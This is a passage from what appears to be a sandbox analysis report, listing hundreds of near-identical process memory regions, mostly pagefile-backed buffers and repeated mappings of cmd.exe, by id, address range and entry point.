entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23878 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23879 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23880 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23881 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23882 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23883 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23884 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23885 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23886 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23887 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23888 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23889 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23890 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23891 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23892 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23893 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23894 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23895 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23896 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23897 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23898 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23899 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23900 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23901 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23902 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23903 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23904 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23905 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23906 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23907 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23908 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23909 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23910 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23945 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23946 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23947 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23948 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23949 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 24823 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 24824 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24825 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24826 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24827 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24828 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24829 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24830 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24831 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24832 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24833 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24834 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28498 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 28499 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28503 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28504 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28505 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28506 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28507 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28508 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28509 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28510 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28511 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28512 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28840 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 28841 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28842 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28843 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28844 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28845 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28846 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28847 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28848 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28849 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28850 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28851 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30274 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 30275 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30276 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30277 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30278 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30279 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30280 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30281 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30282 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30283 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30284 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30285 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30504 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 30505 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30506 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30507 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30508 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30509 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30510 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30511 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30512 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30513 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30514 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30515 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30719 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 30720 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30721 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30722 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30723 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30724 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30725 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30726 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30727 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30728 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30729 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30730 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30967 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 30968 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30969 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30970 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30971 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30972 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30973 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30974 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30975 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30976 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30977 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30978 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31172 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 31173 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31174 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31175 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31176 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31177 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31178 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31179 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31180 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31181 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31182 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31183 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31377 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 31378 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31379 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31380 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31381 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31382 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31383 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31384 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31385 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31386 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31387 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31388 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31718 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 31719 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31720 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31721 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31722 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31723 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31724 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31725 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31726 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31727 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31728 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31729 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32380 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 32381 start_va = 0x4aa80000 end_va = 0x4aa8ffff entry_point = 0x4aa80000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32382 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32383 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32384 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32385 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32386 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32387 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32388 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32389 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32390 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32391 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32706 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 32707 start_va = 0x4a3d0000 end_va = 0x4a3dffff entry_point = 0x4a3d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32708 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32709 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32710 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32711 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32712 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32713 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32714 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32715 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32716 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32717 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33547 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 33548 start_va = 0x4aaf0000 end_va = 0x4aafffff entry_point = 0x4aaf0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33549 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33550 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33551 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33552 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33553 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33554 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33555 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33556 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33557 start_va = 0x1980000 end_va = 0x1980fff entry_point = 